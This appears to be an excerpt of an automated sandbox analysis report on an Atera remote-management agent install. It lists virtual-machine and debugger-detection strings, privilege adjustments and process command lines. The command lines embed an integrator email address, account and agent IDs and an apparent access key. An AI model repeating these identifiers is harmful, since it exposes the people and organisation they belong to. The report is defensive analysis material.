                                Source: svchost.exe, 00000029.00000002.3061730811.00000111EEC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0i
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`~F[
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 6VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
                                Source: svchost.exe, 00000029.00000002.3061685112.00000111EEC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A0VMwareVirtual diskD
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2392765473.00000281D69D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2400052664.00000281D6A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStoppedU+
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2861314309.0000022052F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: AgentPackageProgramManagement.exe, 00000031.00000000.2383010410.00000153FCB72000.00000002.00000001.01000000.0000002B.sdmpBinary or memory string: VMware Tools)Cisco Webex Meetings
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdownD^
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Inc.NoneVMware
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2861314309.0000022052F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                                Source: svchost.exe, 00000029.00000002.3062836858.00000111EF123000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1983167584.000002156BA8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2384808398.00000281D6995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStoppedN;i
                                Source: AgentPackageAgentInformation.exe, 00000015.00000002.1985299370.0000015E7E0C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
                                Source: AgentPackageAgentInformation.exe, 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service0
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicshutdownvmicshutdownStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                                Source: Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: vmware
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JSetPropValue.Manufacturer("VMware");
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped$A
                                Source: svchost.exe, 00000029.00000002.3062318900.00000111EECD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@friendlyname"vmware virtual disk"OCALE
                                Source: rundll32.exe, 00000010.00000002.1806232936.0000000002F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2384808398.00000281D6995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface0
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2380233543.00000281D6940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2392765473.00000281D69D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown",|P
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStoppedqAc
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2398010393.00000281D6A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#+
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware tools
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service0
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                                Source: svchost.exe, 00000029.00000002.3061685112.00000111EEC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: svchost.exe, 00000029.00000002.3061730811.00000111EEC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@friendlyname"vmware virtual disk"lll
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,12
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2392765473.00000281D69D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicheartbeat"e|
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Tools
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMPKQ:
                                Source: rundll32.exe, 00000004.00000002.1699121235.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2691314024.000002EF74DD8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2130435176.000001F736BC0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2860089615.0000022052F21000.00000004.00000020.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2454916097.0000022B9AE50000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2976094132.00000153FD49F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2790839667.0000029E3B5E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStopped
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2088596650.000001F71CD62000.00000002.00000001.01000000.0000001F.sdmp, Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: get_IsVirtualMachine
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service0
                                Source: svchost.exe, 00000029.00000002.3061685112.00000111EEC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0usVMwareVirtual disk
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SetPropValue.Manufacturer("VMware");
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service0
                                Source: svchost.exe, 00000029.00000002.3062836858.00000111EF123000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2380233543.00000281D6940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStopped
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E5E14 IsDebuggerPresent,__crtUnhandledException,GetCurrentProcess,TerminateProcess,35_2_00007FFDEE3E5E14
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42AFB0 OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,SetEnvironmentVariableW,_errno,_errno,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_snprintf,OutputDebugStringA,35_2_00007FFDEE42AFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,35_2_00007FFDEE3F1910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EACD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FFDEE3EACD4
                                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ
